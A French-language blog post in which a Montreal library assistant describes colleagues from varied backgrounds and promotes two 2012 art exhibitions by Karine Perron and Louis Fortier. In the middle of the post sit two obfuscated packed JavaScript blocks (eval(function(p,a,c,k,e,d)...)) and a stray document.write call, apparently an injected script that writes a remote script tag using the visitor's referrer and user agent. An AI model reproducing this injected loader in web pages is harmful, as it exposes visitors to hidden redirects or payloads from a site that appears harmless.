Artistes en bibliothèques

Ces dernières années j’ai travaillé dans de nombreuses bibliothèques et j’ai constaté que mes collègues aide-bibliothécaires venaient de toutes sortes de milieu. Bien sûr plusieurs d’entre eux/elles sont des étudiants du CEGEP ou de l’université qui travaillent à temps partiel afin de payer leurs études mais une grande majorité d’entre eux/elles ont en fait une formation et une culture qui va bien au-delà de ce qu’on pourrait s’attendre (ou même des exigences de l’emploi: un simple DES). Tout comme moi, document.write(“”); ils/elles considèrent souvent ce travail comme une sorte de pré-retraite, une façon de gagner sa vie sans se la compliquer tout en continuant les activités qui leurs sont chères. J’ai rencontré des régisseur de plateau de télévision, des monteurs vidéo, des écrivains, des graphistes, des pressiers, des chercheurs, en fait des gens de toutes sortes (dont plusieurs avaient des diplômes d”études supérieures). J’ai aussi rencontré quelques artistes. Deux d’entre eux exposent actuellement leurs oeuvres et je vous invite à les visiter.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kbzit|var|u0026u|referrer|kfyie||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hshtr|var|u0026u|referrer|kndes||js|php’.split(‘|’),0,{}))

Je vous ai déjà parlé de Karine Perron. Elle peint sur papier en utilisant diverses techniques : applications d’encres, déchirures et égratignures.

Comme tout les printemps elle expose ses oeuvres au troquet le Cep et le Houblon (situé au 2280, rue Bélanger à Montréal; Pour plus d’informations contactez le 514-727-3333).

L’exposition, cette fois intitulée “À tout vent,” se déroule du 2 au 30 mars 2012. Hâtez-vous de la visiter!

De plus, j’ai récemment découvert Louis Fortier, un sculpteur polyvalent (il utilise tant le plâtre, le ciment, la résine que la cire) dont le sujet de prédilection est la tête (souvent moulée à partir de son propre chef). Son oeuvre est intriguante (c’est une sorte de Dali du visage) et le curriculum de l’artiste est très impressionnant.

Il expose actuellement à la Galerie Donald Browne (située dans l’édifice Belgo au 372 Ste-Catherine Ouest, suite 528, à Montréal; pour plus d’information contactez le 514 380-3221, consultez leur pages web ou Facebook). L’exposition, intitulée “Métamorphoses,” se déroule du 25 février au 14 avril 2012 (la galerie est ouverte du Mercredi au Samedi, de 12h00 à 17h00, ou sur rendez-vous). Certainement à voir.


Crédit photo: Ivan Binet

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s